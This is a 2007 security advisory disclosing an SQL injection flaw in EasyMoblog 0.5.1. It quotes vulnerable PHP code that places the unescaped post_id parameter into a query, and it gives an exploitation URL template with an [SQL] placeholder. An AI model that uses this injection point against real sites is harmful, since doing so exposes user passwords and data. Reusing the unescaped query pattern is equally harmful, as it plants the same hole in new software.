Sql_Vulnerability_EasymoBlog-2.txt

2007-02-06T00:00:00
ID PACKETSTORM:54178
Type packetstorm
Reporter Tal Argoni
Modified 2007-02-06T00:00:00

Description

                                        
                                            `   
·= Security Advisory =·  
  
Issue: Sql injection Vulnerability in EasyMoblog by Umberto Caldera.  
Discovered Date: 30/01/07  
Author: Tal Argoni, LegendaryZion. [talargoni at gmail.com]  
Product Vendor: http://sourceforge.net/project/showfiles.php?group_id=88633  
Ver: easymoblog-0.5.1  
Details:  
  
EasyMoblog is prone to a Sql Injection Vulnerability.  
The vulnerability exists in comment_add function, caused by the lack of  
Input Validation/Filtering of quotation and malicious characters  
in the GET parameter "i" OR in the POST parameter "post_id".  
  
The use of post_details function is done by "add_comment.php"  
that exist in "libraries.inc.php".  
  
  
Contents of libraries.inc.php:  
---------------------------------  
...  
  
function comment_add ($comment) { .....  
  
  
$query = "  
insert into ".CFG_MYSQL_TABPREFIX."comments  
(comment_author,comment_author_email,comment_text,comment_added,post_id)  
values (  
'".addslashes($comment['comment_author'])."',  
'".addslashes($comment['comment_author_email'])."',  
'".addslashes($comment['comment_text'])."',  
'".time()."',  
'".$comment['post_id']."'  
)  
";  
$res = mysql_query($query);  
  
...  
  
Contents of add_comment.php:  
---------------------------------  
...  
  
$form['post_id'] = '';  
if(isset($_POST['post_id'])) $form['post_id'] = $_POST['post_id'];  
elseif(isset($_GET['i'])) $form['post_id'] = $_GET['i'];  
else exit();   
.........  
  
if (count($errors) == 0) {  
$comment = $form;  
  
$comment = comment_add ($comment);  
Header ("Location: list_comments.php?i=".$comment['post_id']);  
exit();  
...  
  
  
  
  
Exploitation URL:  
http://www.example.com/easymoblog/add_comment.php?i='[SQL]  
  
Successful exploitation may allow execution of Sql code.   
This could also be exploited to get the passwords, users  
and a lot of informaion, commit Denial Of Service attacks and more...  
  
Proof Of Concept:  
http://www.example.com/easymoblog/add_comment.php?i='[SQL]  
  
  
`